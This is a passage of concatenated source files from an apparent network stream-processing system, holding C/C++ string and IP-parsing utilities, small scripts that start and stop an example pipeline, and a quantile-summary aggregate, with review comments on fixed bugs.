	}
	return (gs_param_handle_t) reg;
}
/* partial function: return 0 if the value is valid */
// Extract the first substring of str matching the compiled regex.
// result points shallowly into str's own buffer (no copy); returns 1 on
// no match, empty input, or allocation failure. Non-reentrant: uses a
// static scratch buffer to NUL-terminate str for regexec.
gs_retval_t str_extract_regex( vstring * result, vstring * str, gs_param_handle_t handle) {
	regex_t * reg = (regex_t *) handle ;
	gs_sp_t source = (gs_sp_t)(str->offset);
	gs_retval_t res;
	regmatch_t match;	// byte offsets of the overall match
	static gs_sp_t d=0;	// scratch buffer, persists across calls
	static gs_uint32_t dlen=0;	// current scratch capacity
	// grow our static buffer to the longest string we ever see
	if ((str->length+1) >= dlen) {
		if (d!=0) free((void*)d);
		dlen=0;
		d=0;
		if ((d=(gs_sp_t)malloc(str->length+1))==0) return 1;
		dlen=str->length+1;
	}
	if (str->length==0) return 1;
	// copy the string and 0 terminate it
	memcpy((void *)d,(void *) str->offset, str->length);
	d[str->length]=0;
	res = REG_NOMATCH;
	res = regexec(reg, d, 1, &match, 0);
	if (res==REG_NOMATCH) return 1;
	// Shallow result: slice of the original payload, not the scratch copy.
	result->offset= (gs_p_t) &source[match.rm_so];
	result->length=match.rm_eo-match.rm_so;
	result->reserved = SHALLOW_COPY;
	return 0;
}
// Release a handle from register_handle_for_str_extract_regex_slot_1.
// Fix: regfree() was called before the NULL check — undefined behavior
// when registration had failed (handle == 0).
gs_retval_t deregister_handle_for_str_extract_regex_slot_1(gs_param_handle_t handle) {
	regex_t * x = (regex_t *) handle;
	if (x!=0) {
		regfree(x);
		free(x);
	}
	return 0;
}
// -------------------------------------------------
// More substring functions
// Return (shallow) the last n bytes of s, or all of s when s is shorter
// than n. Prefix extraction is handled by str_truncate (include file).
gs_retval_t str_suffix(vstring *result, vstring *s, gs_uint32_t n){
	gs_uint32_t keep = (n > s->length) ? s->length : n;
	result->offset = (gs_p_t)s->offset + (s->length - keep);
	result->length = keep;
	result->reserved = SHALLOW_COPY;
	return 0;
}
// Split the string on sep and return the pos'th (0-based) field, shallow.
// Only the first byte of sep is used. On any failure — empty separator,
// too few separators, or an empty/missing final field — result is a
// zero-length shallow string and the return value is still 0.
gs_retval_t get_list_entry(vstring *result, vstring *l, vstring *sep, gs_uint32_t pos){
	char s;
	gs_int32_t c;
	result->offset = l->offset; // empty return string
	result->reserved = SHALLOW_COPY;
	result->length = 0;
	if(sep->length > 0){ // get the sep char, ensure the string is nonempty
		s = ((gs_sp_t)(sep->offset))[0];
	}else{
		return 0;
	}
	// Advance c just past the pos'th separator.
	for(c=0;c < l->length && pos>0; ++c){
		if(((gs_sp_t)(l->offset))[c] == s){
			pos--;
		}
	}
	if(pos>0 || c >= l->length-1){ // not enough seps, or final string is empty
		return 0;
	}
	result->offset = l->offset + c;
	// Extend the result up to the next separator (or end of string).
	for(; c<l->length && ((gs_sp_t)(l->offset))[c] != s; ++c, ++result->length);
	return 0;
}
// -------------------------------------------------
// Scan str from *offset for the next run of decimal digits (skipping any
// leading non-digits) and accumulate its value into *res (no overflow
// protection). On return *offset points at the character that ended the
// number, so repeated calls step through all numbers in the string.
// Returns 1 if at least one digit was consumed, 0 otherwise.
static gs_uint32_t nextint(struct vstring *str , gs_uint32_t * offset, gs_uint32_t *res) {
	gs_uint8_t * s = (gs_uint8_t *)(str->offset);
	int v = 0;	// set once at least one digit has been consumed
	*res = 0;
	while(*offset<str->length) {
		if ((s[*offset]>='0') && (s[*offset]<='9')) {
			v=1;
			*res= (*res*10) + (gs_uint32_t) (s[*offset]-'0');
		} else {
			if (v!=0) { // got some valid result; leave *offset at the delimiter
				return 1;
			} // otherwise skip leading garbage
		}
		(*offset)++;
	}
	return v;	// string ended: 1 if we were inside a number, else 0
}
// Parse the first unsigned decimal integer found in s into *r.
// Returns 0 on success, 1 when s contains no digits.
gs_uint32_t strtoi(gs_uint32_t * r, struct vstring * s)
{
	gs_uint32_t pos = 0;
	return nextint(s, &pos, r) ? 0 : 1;
}
// Constant-folding hook for strtoi: parse istr once at registration and
// encode the parsed value directly in the handle (0 when no digits).
gs_param_handle_t register_handle_for_strtoi_c_slot_0(vstring* istr) {
	gs_uint32_t pos = 0;
	gs_uint32_t val = 0;
	if (nextint(istr, &pos, &val) == 0)
		return (gs_param_handle_t) 0;
	return (gs_param_handle_t) val;
}
// Nothing to release: the "handle" is the parsed value itself.
gs_retval_t deregister_handle_for_strtoi_c_slot_0(gs_param_handle_t h) {
	return 0;
}
// Parse a dotted-quad IPv4 address from s into host-order *r.
// Any non-digit characters act as separators (nextint skips them).
// Returns 0 on success, 1 when fewer than four numbers are present.
gs_uint32_t strtoip(gs_uint32_t * r, struct vstring * s)
{
	gs_uint32_t octet, addr = 0, offset = 0;
	gs_int32_t i;
	for (i = 0; i < 4; i++) {
		if (nextint(s, &offset, &octet) == 0) return 1;
		addr = (addr << 8) | octet;	// same packing as ip1<<24|ip2<<16|ip3<<8|ip4
	}
	*r = addr;
	return 0;
}
// Constant-folding hook for strtoip: parse the dotted quad once at
// registration and encode the packed address in the handle (0 on failure).
gs_param_handle_t register_handle_for_strtoip_c_slot_0(vstring* istr) {
	gs_uint32_t octet, addr = 0, offset = 0;
	gs_int32_t i;
	for (i = 0; i < 4; i++) {
		if (nextint(istr, &offset, &octet) == 0) return (gs_param_handle_t)0;
		addr = (addr << 8) | octet;
	}
	return (gs_param_handle_t)addr;
}
// Nothing to release: the "handle" is the packed address itself.
gs_retval_t deregister_handle_for_strtoip_c_slot_0(gs_param_handle_t h) {
	return 0;
}
// Partition hash over two keys: simple XOR of the values.
gs_uint32_t partn_hash( gs_uint32_t ip1, gs_uint32_t ip2) {
	return (ip1^ip2);
}
// Pseudo-random partition value; uses unseeded rand(), not crypto-grade.
gs_uint32_t rand_hash() {
	return rand();
}
///////////////////////////////////////
// IPv6 fcns.
// return negative if s1 < s2, 0 if s1==s2, positive if s1>s2
// Three-way comparison of IPv6 addresses, most-significant word first:
// negative if i1 < i2, 0 if equal, positive if i1 > i2.
gs_retval_t hfta_ipv6_compare(const hfta_ipv6_str &i1, const hfta_ipv6_str &i2) {
	int w;
	for (w = 0; w < 4; w++) {
		if (i1.v[w] > i2.v[w])
			return 1;
		if (i1.v[w] < i2.v[w])
			return -1;
	}
	return 0;
}
// Bitwise AND of two IPv6 addresses (e.g. for prefix masking).
hfta_ipv6_str And_Ipv6(const hfta_ipv6_str &i1, const hfta_ipv6_str &i2){
	hfta_ipv6_str ret;
	int w;
	for (w = 0; w < 4; w++)
		ret.v[w] = i1.v[w] & i2.v[w];
	return ret;
}
// Bitwise OR of two IPv6 addresses.
hfta_ipv6_str Or_Ipv6(const hfta_ipv6_str &i1, const hfta_ipv6_str &i2){
	hfta_ipv6_str ret;
	int w;
	for (w = 0; w < 4; w++)
		ret.v[w] = i1.v[w] | i2.v[w];
	return ret;
}
// 32-bit hash of an IPv6 address: XOR of its four words.
gs_uint32_t hfta_ipv6_hashfunc(const hfta_ipv6_str *s) {
	return s->v[0] ^ s->v[1] ^ s->v[2] ^ s->v[3];
}
// Host-to-network conversion for IPv6 values. Byte swapping is
// intentionally disabled (the htonl calls were commented out in the
// original), so the address is returned unchanged.
hfta_ipv6_str hton_ipv6(hfta_ipv6_str s){
	return s;
}
// Network-to-host conversion for IPv6 values. Byte swapping is
// intentionally disabled (the ntohl calls were commented out in the
// original), so the address is returned unchanged.
hfta_ipv6_str ntoh_ipv6(hfta_ipv6_str s){
	return s;
}
// Parse an IPv6 literal of the fully expanded form "x:x:x:x:x:x:x:x"
// (hex groups) into four 32-bit words. Groups that sscanf fails to match
// keep their 0 initializers, so compressed "::" forms are zero-filled
// from the failure point onward rather than rejected.
int HFTA_Ipv6_Constructor(hfta_ipv6_str *s, gs_csp_t l) {
	gs_uint32_t i0=0,i1=0,i2=0,i3=0,i4=0,i5=0,i6=0,i7=0;
	sscanf(l,"%x:%x:%x:%x:%x:%x:%x:%x",&i0,&i1,&i2,&i3,&i4,&i5,&i6,&i7);
	// Pack two 16-bit groups per word, high group first.
	s->v[0] = ((i0 & 0xffff) << 16) | (i1 & 0xffff);
	s->v[1] = ((i2 & 0xffff) << 16) | (i3 & 0xffff);
	s->v[2] = ((i4 & 0xffff) << 16) | (i5 & 0xffff);
	s->v[3] = ((i6 & 0xffff) << 16) | (i7 & 0xffff);
	return(0);
}
// Return 1 if s2 occurs as a byte substring of s1, else 0.
// Fixes: lengths were stored in gs_uint8_t, truncating strings longer
// than 255 bytes and underflowing when s2 is longer than s1; the scan
// also stopped one alignment short of the last possible match position.
gs_retval_t str_exists_substr(vstring * s1,vstring * s2)
{
	gs_uint8_t *st1 = (gs_uint8_t *)s1->offset;
	gs_uint8_t *st2 = (gs_uint8_t *)s2->offset;
	gs_uint32_t len1 = s1->length;
	gs_uint32_t len2 = s2->length;
	gs_uint32_t x,y;
	if (len2 == 0)
		return 1;	// empty pattern trivially matches
	if (len2 > len1)
		return 0;	// pattern longer than subject: no match possible
	for (x=0; x<=len1-len2 ; x++)
	{
		if (st1[x]== st2[0])
		{
			for (y=0; y<len2 && st1[x+y]==st2[y];y++);
			if (y==len2)
				return 1;
		}
	}
	return 0;
}
// Query-exposed wrapper around hfta_vstr_compare: <0 / 0 / >0 for
// s1 <, ==, > s2 (byte-lexicographic over the common prefix, then length).
gs_retval_t str_compare(vstring *s1,vstring *s2)
{
	return hfta_vstr_compare(s1,s2);
}
// Return 1 when s1 occurs in s2 exactly at byte position `offset`,
// 0 otherwise (including when fewer than s1->length bytes remain).
gs_uint32_t str_match_offset( gs_uint32_t offset, vstring *s1, vstring *s2)
{
	gs_int32_t len1 = s1->length;
	gs_int32_t len2 = s2->length-offset;	// bytes of s2 available at offset
	if (len2 < len1)
		return 0;
	return (memcmp((gs_uint8_t *)s1->offset,
	               ((gs_uint8_t *)s2->offset) + offset,
	               len1) == 0) ? 1 : 0;
}
// Return 1 when byte `offset` of s2 equals the low byte of val,
// 0 otherwise (including when offset is past the end of s2).
gs_uint32_t byte_match_offset( gs_uint32_t offset, gs_uint32_t val,vstring *s2)
{
	if (s2->length <= offset)	// offset is unsigned, so no < 0 case
		return 0;
	gs_uint8_t expect = (unsigned char) val;
	return (((gs_uint8_t *)s2->offset)[offset] == expect) ? 1 : 0;
}
// -------------------------------------------------------
// map_int_to_string and its support functions, structs
// Handle state for int_to_string_map: the loaded id->string table, the
// source file name, and a shared empty string returned on lookup miss.
struct int_to_string_map_struct{
	std::map<gs_int64_t, vstring> i2s_map;	// id -> mapped string (malloc'd payloads)
	std::string fname;	// file the table was loaded from
	vstring empty_string;	// shared result for ids not in the map
};
// Load a CSV file of "<int64>,<string>" lines into a lookup table and
// return it as the parameter handle (0 on failure).
// Fixes: the handle and its empty-string buffer were leaked on the
// failure paths; the fopen-failure log passed the vstring struct pointer
// to %s (now logs the NUL-terminated copy); a duplicate key used to leak
// the previously stored value's buffer.
gs_param_handle_t register_handle_for_int_to_string_map_slot_1(vstring *filename){
	int_to_string_map_struct *map_struct;
	map_struct = new int_to_string_map_struct();
	if(map_struct == NULL){
		gslog(LOG_EMERG, "int_to_string_map:: Could not allocate handle memory\n");
		return 0;
	}
	map_struct->empty_string.offset = (gs_p_t)malloc(1);
	map_struct->empty_string.reserved = INTERNAL;
	map_struct->empty_string.length = 0;
	// NUL-terminated copy of the file name (vstrings are not terminated).
	gs_sp_t filenamec;
	filenamec = (gs_sp_t)alloca(filename->length+1);
	if (filenamec==0) {
		gslog(LOG_EMERG, "int_to_string_map:: Could not allocate filename memory\n");
		free((void *)(map_struct->empty_string.offset));
		delete map_struct;	// fix: don't leak the handle on failure
		return 0;
	}
	memcpy(filenamec,(gs_sp_t)filename->offset,filename->length);
	filenamec[filename->length]=0;
	map_struct->fname = filenamec;
	FILE *fl = fopen(filenamec, "r");
	if(fl==NULL){
		// fix: log the C string, not the vstring struct pointer
		gslog(LOG_EMERG, "int_to_string_map:: Could not open regex file %s \n",filenamec);
		free((void *)(map_struct->empty_string.offset));
		delete map_struct;	// fix: don't leak the handle on failure
		return 0;
	}
	gs_int32_t buflen = 10000;
	char buf[buflen], buf_str[buflen];
	gs_int64_t val;
	char *fret;
	fret = fgets(buf, buflen, fl);
	while(fret != NULL){
		int nvals = sscanf(buf, "%lld,%s", &val, buf_str);
		if(nvals >= 2){
			vstring new_str;
			new_str.reserved = SHALLOW_COPY;
			new_str.length = strlen(buf_str);
			new_str.offset = (gs_p_t)malloc(new_str.length);
			memcpy((char *)new_str.offset, buf_str, new_str.length);
			// fix: free the old buffer when a key appears more than once
			std::map<gs_int64_t, vstring>::iterator prev = map_struct->i2s_map.find(val);
			if(prev != map_struct->i2s_map.end())
				free((void *)(prev->second.offset));
			map_struct->i2s_map[val] = new_str;
		}
		fret = fgets(buf, buflen, fl);
	}
	fclose(fl);
	return (gs_param_handle_t) map_struct;
}
// Look up val in the table behind handle and return the mapped string
// (shallow); misses return the handle's shared empty string.
// Fix: count() followed by operator[] performed two tree searches per
// call; a single find() does one and can never accidentally insert.
gs_retval_t int_to_string_map(vstring *result, gs_int64_t val, gs_param_handle_t handle){
	int_to_string_map_struct *map_struct = (int_to_string_map_struct *)handle;
	std::map<gs_int64_t, vstring>::const_iterator it = map_struct->i2s_map.find(val);
	const vstring &ret = (it != map_struct->i2s_map.end())
		? it->second : map_struct->empty_string;
	result->offset = ret.offset;
	result->reserved = ret.reserved;
	result->length = ret.length;
	return 0;
}
// Release a handle from register_handle_for_int_to_string_map_slot_1:
// free every mapped string buffer, the shared empty string, and the
// handle itself.
// Fix: the function was declared to return gs_param_handle_t but had no
// return statement (undefined behavior); it now returns 0.
gs_param_handle_t deregister_handle_for_int_to_string_map_slot_1(gs_param_handle_t handle){
	int_to_string_map_struct *map_struct = (int_to_string_map_struct *)handle;
	for(std::map<gs_int64_t, vstring>::iterator i2si = map_struct->i2s_map.begin(); i2si!=map_struct->i2s_map.end(); ++i2si){
		free((void *)((*i2si).second.offset));
	}
	free((void *)(map_struct->empty_string.offset));
	delete map_struct;
	return 0;
}
// ---------------------------------------------------
// Render a (possibly binary, non-ASCII) string as lowercase hex: two
// output characters per input byte. The result buffer is malloc'd and
// owned by the result (INTERNAL).
static char hexmap[16] = {
	'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'
};
gs_retval_t to_hex_string(vstring *result, vstring *val){
	const unsigned char *src = (unsigned char *)(val->offset);
	result->length = 2*(val->length);
	result->reserved = INTERNAL;
	result->offset = (gs_p_t)malloc(result->length);
	unsigned char *dst = (unsigned char *)(result->offset);
	for(int i = 0; i < val->length; ++i){
		*dst++ = hexmap[src[i] >> 4];	// high nibble first
		*dst++ = hexmap[src[i] & 0x0f];
	}
	return 0;
}
// ---------------------------------------------
// sum up unsigned integers expressed as a string with separators,
// e.g. on input '34|45|56' and sep '|', return 135.
// This kind of thing is common in Nokia PCMD data.
// gracefully handle empty entries, e.g. '|8|' should return 8
// NOTE(review): a non-digit, non-separator character contributes 0 as a
// digit but still multiplies the running value by 10 (e.g. "4x5" -> 405);
// confirm this is acceptable for the feeds involved. No overflow checks.
gs_int64_t sum_uint_in_list(struct vstring *list, struct vstring *sepchar){
	gs_int64_t ret = 0;
	gs_int64_t val = 0;	// value of the field currently being scanned
	char sep;
	char v;
	int c;
	if(sepchar->length < 1)	// no separator byte supplied
		return 0;
	sep = ((char *)(sepchar->offset))[0];	// only the first byte is used
	for(c=0;c<list->length;++c){
		v = ((char *)(list->offset))[c];
		if(v==sep){
			ret+=val;	// field boundary: bank the field's value
			val = 0;
		}else{
			val = 10*val + (v>='0' && v<='9')*(v-'0');
		}
	}
	ret += val;	// final (possibly empty) field
	return ret;
}
// Convert a string to a signed 64-bit integer: optional leading '-'
// followed by decimal digits. Returns 0 for an empty string.
// NOTE(review): any non-digit character counts as digit 0 but still
// scales the accumulated value by 10; there is no overflow protection.
gs_int64_t to_llong(vstring *v){
	gs_int64_t ret=0;
	gs_uint8_t d;
	int c;
	int neg=1;	// sign multiplier, -1 when the first char is '-'
	if(v->length < 1)
		return 0;
	d = ((char *)(v->offset))[0];
	if(d=='-'){
		neg=-1;
	}else{
		ret = (d>='0' && d<='9')*(d-'0');
	}
	for(c=1;c<v->length;++c){
		d = ((char *)(v->offset))[c];
		ret = 10*ret+(d>='0' && d<='9')*(d-'0');
	}
	return neg*ret;
}
<file_sep>#!/bin/sh
./killexample
sleep 1
./runit
sleep 10
../../bin/gsprintconsole `cat gshub.log` default example1 -s > example1.csv &
../../bin/gsprintconsole `cat gshub.log` default example2 -s > example2.csv &
sleep 1
../../bin/start_processing
<file_sep>#!/bin/sh
./stopit
killall gsprintconsole
killall gen_feed.py
killall -9 gsprintconsole
killall -9 gen_feed.py
<file_sep>#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <math.h>
#include "hfta_udaf.h"
#include <algorithm> // std::sort
#include<iostream>
#include "udaf_common.h"
//#define QUANT_LFTA1_SIZE 729
//#define QUANT_LFTA2_SIZE 181
//#define QUANT_LFTA3_SIZE 50
//#define QUANT_EPS 0.01
//#define SKIPDIR_SIZE 100
//#define SKIPDIR_HEIGHT_MAX 7
//#define max(a,b) ((a) > (b) ? (a) : (b))
using namespace std;
// current use
// hfta_only: quant_udaf_hfta0
// extraction: extr_quant_hfta0_fcn extr_med_hfta0_fcn extr_quant_hfta0_space
// lfta/hfta: quant_udaf_lfta3 quant_udaf_hfta3
// TODO
// - Should the hfta part of the hfta/lfta split (hfta3)
// match the hfta-only implementation (hftaZ)?
// - On out-of-space conditions, try a compress before
// discarding the sample. If that happens, can the rate
// of compresses be decreased?
// - Can the lfta part be made to work with actual compression?
// if not, change the implementation to gather a collection
// of samples, then send them up. This should decrease
// lfta space use and reduce the cost of adding to the hfta.
/****************************************************************/
/* Data Structures */
/****************************************************************/
/****************************************************************/
// One tuple of a GK quantile summary: sample value, count of samples
// collapsed into this tuple (gap), rank slack (del), and the slot index
// of the next tuple in value order (index 0 serves as NULL).
template <class T> struct tuple_t {
	T val;
	gs_uint32_t gap;
	gs_uint32_t del;
	gs_uint32_t next;
};
// One node of the skip directory indexing the tuple list.
template <class T> struct skipnode_t {
	T val;
	gs_uint32_t next;	// next node on the same level
	gs_uint32_t down;	// node/tuple one level below
};
// Multi-level skip-list directory over the tuple list.
template <class T> struct skipdir_t {
	gs_uint32_t height; // height of tree
	gs_uint32_t freeptr; // cursor space stack
	gs_uint32_t headptr[SKIPDIR_HEIGHT_MAX]; // ptrs to levels
	skipnode_t<T> list[SKIPDIR_SIZE+1];
};
/****************************************************************/
// Fixed-size LFTA-side sketch: slot-array tuple list plus skip
// directory. This struct is what the LFTA ships (possibly compacted)
// to the HFTA.
template <class T> struct quant_udaf_lfta3_struct_t {
	gs_uint32_t nelts;	// samples absorbed so far
	gs_uint32_t freeptr;	// head of the free-slot stack (0 = full)
	gs_uint32_t usedptr;	// head of the in-use tuple list (0 = empty)
	gs_uint32_t circptr;	// roving cursor used by the compress pass
	gs_uint32_t size;	// slots currently allocated
	tuple_t<T> t[QUANT_LFTA3_SIZE+1];	// slot 0 is the NULL slot
	skipdir_t<T> sd;
};
// HFTA-side supertuple: malloc'd, pointer-linked, sorted by val.
template <class T> struct supertuple3_t{ // hfta/lfta
	T val;
	gs_uint32_t gap;
	gs_uint32_t del;
	struct supertuple3_t<T> *next;
};
// Index-linked supertuple used by the hfta-only variant.
template <class T> struct supertupleZ_t{
	T val;
	gs_uint32_t gap;
	gs_uint32_t del;
	gs_int32_t next;
};
// HFTA aggregate state shared by the variants; the hfta3 code in this
// file uses only nelts and the pointer-linked list t.
template <class T> struct quant_udaf_hfta_struct_t {
	gs_uint32_t nelts; // 4 bytes
	short int used_head;
	short int free_head;
	supertupleZ_t<T> *st;
	gs_uint32_t *vals;
	supertuple3_t<T> *t; // 8 bytes
};
/*************************** Version 3 **************************/
/* Version 3: LFTA-medium */
/****************************************************************/
// Debug helper: log every supertuple (val, gap, del) in list order.
// NOTE(review): the %u conversion only matches unsigned 32-bit
// instantiations; the int64/float variants will log garbled values.
template <class T> void quant_hfta3_print(quant_udaf_hfta_struct_t<T> *s)
{
	supertuple3_t<T> *t;
	//printf("In quant_hfta3_print, s=%llx, t=%llx\n",(unsigned long long int)s,(unsigned long long int)(s->t));
	gslog(LOG_DEBUG,"HFTA tuples:\n");
	for (t=s->t; t != NULL; t=t->next) {
		gslog(LOG_DEBUG,"(%u, %u, %u)\n",t->val,t->gap,t->del);
	}
}
// Merge pass over the HFTA super-list: fold a tuple into its successor
// (freeing the absorbed node) whenever the combined weight stays under
// the 2*eps*n error budget. The head and tail tuples — the observed
// min and max — are never candidates for removal.
template <class T> void quant_hfta3_compress(quant_udaf_hfta_struct_t<T> *s)
{
	supertuple3_t<T> *t=s->t, *d;	// t trails one node behind candidate d
	gs_uint32_t threshold;
	threshold = (gs_uint32_t)ceil((2.0 * QUANT_EPS) * (float)(s->nelts));
	if ((t == NULL) || (t->next == NULL)) return;	// 0 or 1 tuples: nothing to merge
	d = t->next;
	while ((d != NULL) && (d->next != NULL)) {
		if (d->gap+d->next->gap+d->next->del < threshold) {
			// d's count moves into its successor; unlink and free d.
			d->next->gap += d->gap;
			t->next = d->next;
			free(d);
		}
		t = t->next;
		d = t->next;
	}
}
/****************************************************************/
/* HFTA3 functions */
/****************************************************************/
// since it does mallocs instead of allocations in a fixed block of memory
// Reset the HFTA quantile aggregate in buffer b to the empty state:
// zero the count, clear all list pointers, and mark the (unused by this
// variant) index-linked heads as empty (-1).
template <class T> void quant_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b) {
	quant_udaf_hfta_struct_t<T> *agg = (quant_udaf_hfta_struct_t<T> *)b;
	agg->nelts = 0;
	agg->used_head = -1;
	agg->free_head = -1;
	agg->t = NULL;
	agg->st = NULL;
	agg->vals = NULL;
}
// Per-type INIT entry points; each forwards to the template above.
void quant_ui_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b){ quant_udaf_hfta3_HFTA_AGGR_INIT_<gs_uint32_t>(b); }
void quant_i_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b){ quant_udaf_hfta3_HFTA_AGGR_INIT_<gs_int32_t>(b); }
void quant_ul_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b){ quant_udaf_hfta3_HFTA_AGGR_INIT_<gs_uint64_t>(b); }
void quant_l_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b){ quant_udaf_hfta3_HFTA_AGGR_INIT_<gs_int64_t>(b); }
void quant_f_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b){ quant_udaf_hfta3_HFTA_AGGR_INIT_<gs_float_t>(b); }
// Merge one serialized LFTA sketch (carried in vstring v) into the HFTA
// super-summary in buffer b. Walks the incoming tuple list and the
// malloc'd super-list in parallel: equal values merge their counts,
// skipped supertuples accumulate rank slack, and new values are spliced
// in as fresh supertuples. Finishes with a compress pass to stay within
// the error budget.
template <class T> void quant_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v) {
	quant_udaf_hfta_struct_t<T> *s = (quant_udaf_hfta_struct_t<T> *)b;
	quant_udaf_lfta3_struct_t<T> *vs = (quant_udaf_lfta3_struct_t<T> *)(v->offset);
	supertuple3_t<T> *t=s->t, *tprev=NULL;	// scan / trailing ptr on super-list
	tuple_t<T> *u=vs->t;	// incoming sketch's slot array
	supertuple3_t<T> *newptr;
	gs_uint32_t uptr = vs->usedptr;	// cursor over the incoming tuple list
	gs_uint32_t threshold;
	if (uptr == 0) return;	// empty incoming sketch
	//if (v->length != sizeof(quant_udaf_lfta3_struct_t)) return;
	// Error budget of the incoming sketch, used to pre-merge its tuples.
	threshold = (gs_uint32_t)ceil((2.0 * QUANT_EPS) * (float)(vs->nelts));
	while (uptr != 0) {
		//printf("uptr=%d\n",uptr);
		// Pre-merge: fold this incoming tuple into its successor when the
		// combined weight stays under the threshold.
		if ((u[uptr].next != 0) && (u[uptr].gap+u[u[uptr].next].gap+u[u[uptr].next].del < threshold)) {
			u[u[uptr].next].gap += u[uptr].gap;
		}
		else {
			// Advance t to the insertion point in the super-list.
			while ((t != NULL) && (t->val <= u[uptr].val)) {
				if (t->val == u[uptr].val) {
					// Equal values: merge counts/slack and advance the input.
					t->gap += u[uptr].gap;
					t->del += u[uptr].del;
					uptr = u[uptr].next;
					if (!uptr) break;
				}
				else {
					// Passing over a supertuple adds rank uncertainty.
					t->del += u[uptr].gap+u[uptr].del-1;
				}
				tprev = t;
				t = t->next;
			}
			if (!uptr) break;
			// Splice a fresh supertuple for this value.
			// NOTE(review): malloc result is not checked here.
			newptr = (supertuple3_t<T> *)malloc(sizeof(supertuple3_t<T>));
			newptr->val = u[uptr].val;
			newptr->gap = u[uptr].gap;
			newptr->del = u[uptr].del;
			if (t != NULL)
				newptr->del += t->gap + t->del - 1;
			// merge into superstructure
			newptr->next = t;
			if (tprev == NULL)
				s->t = newptr;
			else
				tprev->next = newptr;
			tprev = newptr;
			s->nelts += u[uptr].gap;
		}
		uptr = u[uptr].next;
	}
	quant_hfta3_compress<T>(s);
	//quant_hfta3_print(s);
	//printf("exiting quant_udaf_hfta3_HFTA_AGGR_UPDATE_, s=%llx, t=%llx\n",(unsigned long long int)s,(unsigned long long int)(s->t));
}
// Non-template UPDATE entry points, one per supported element type.
void quant_ui_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v){
	quant_udaf_hfta3_HFTA_AGGR_UPDATE_<gs_uint32_t>(b, v);
}
void quant_i_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v){
	quant_udaf_hfta3_HFTA_AGGR_UPDATE_<gs_int32_t>(b, v);
}
void quant_ul_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v){
	quant_udaf_hfta3_HFTA_AGGR_UPDATE_<gs_uint64_t>(b, v);
}
void quant_l_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v){
	quant_udaf_hfta3_HFTA_AGGR_UPDATE_<gs_int64_t>(b, v);
}
void quant_f_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v){
	quant_udaf_hfta3_HFTA_AGGR_UPDATE_<gs_float_t>(b, v);
}
// Serialize the aggregate by exposing a shallow pointer to its internal
// state; the extraction functions below interpret the payload.
// (Removed the unused local `s`, which was only referenced by a
// commented-out debug printf.)
template <class T> void quant_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
	r->length = sizeof(quant_udaf_hfta_struct_t<T>);
	r->offset = (gs_p_t )b;
	r->reserved = SHALLOW_COPY;
}
// Non-template OUTPUT entry points, one per supported element type.
void quant_ui_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
	quant_udaf_hfta3_HFTA_AGGR_OUTPUT_<gs_uint32_t>(r, b);
}
void quant_i_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
	quant_udaf_hfta3_HFTA_AGGR_OUTPUT_<gs_int32_t>(r, b);
}
void quant_ul_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
	quant_udaf_hfta3_HFTA_AGGR_OUTPUT_<gs_uint64_t>(r, b);
}
void quant_l_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
	quant_udaf_hfta3_HFTA_AGGR_OUTPUT_<gs_int64_t>(r, b);
}
void quant_f_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
	quant_udaf_hfta3_HFTA_AGGR_OUTPUT_<gs_float_t>(r, b);
}
// Release the aggregate's supertuple list: walk the malloc'd chain and
// free every node.
template <class T> void quant_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) {
	quant_udaf_hfta_struct_t<T> *s = (quant_udaf_hfta_struct_t<T> *)b;
	supertuple3_t<T> *nxt;
	for (supertuple3_t<T> *cur = s->t; cur != NULL; cur = nxt) {
		nxt = cur->next;	// grab the link before freeing the node
		free(cur);
	}
}
// Non-template DESTROY entry points, one per supported element type.
void quant_ui_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) {
	quant_udaf_hfta3_HFTA_AGGR_DESTROY_<gs_uint32_t>(b);
}
void quant_i_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) {
	quant_udaf_hfta3_HFTA_AGGR_DESTROY_<gs_int32_t>(b);
}
void quant_ul_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) {
	quant_udaf_hfta3_HFTA_AGGR_DESTROY_<gs_uint64_t>(b);
}
void quant_l_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) {
	quant_udaf_hfta3_HFTA_AGGR_DESTROY_<gs_int64_t>(b);
}
void quant_f_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) {
	quant_udaf_hfta3_HFTA_AGGR_DESTROY_<gs_float_t>(b);
}
/****************************************************************/
/* HFTA3 Extraction functions */
/****************************************************************/
// Extract the phi-quantile from a serialized hfta3 summary: pick the
// supertuple whose rank interval [rmin, rmax] lies closest to the target
// rank phi*n.
// Fixes: `p` was read uninitialized (undefined behavior) when the summary
// was empty -- now guarded and seeded; dropped the unused `count` local.
template <class T> T extr_quant_hfta3_fcn(vstring *v, gs_float_t phi) {
	quant_udaf_hfta_struct_t<T> *vs = (quant_udaf_hfta_struct_t<T> *)(v->offset);
	supertuple3_t<T> *t, *p;
	gs_uint32_t nelts=0;
	gs_int32_t rmin=0, rmax, rank, ropt=INT_MAX;
	if (vs->t == NULL)	// empty summary: no sample to report
		return (T)0;
	for (t=vs->t; t != NULL; t=t->next)
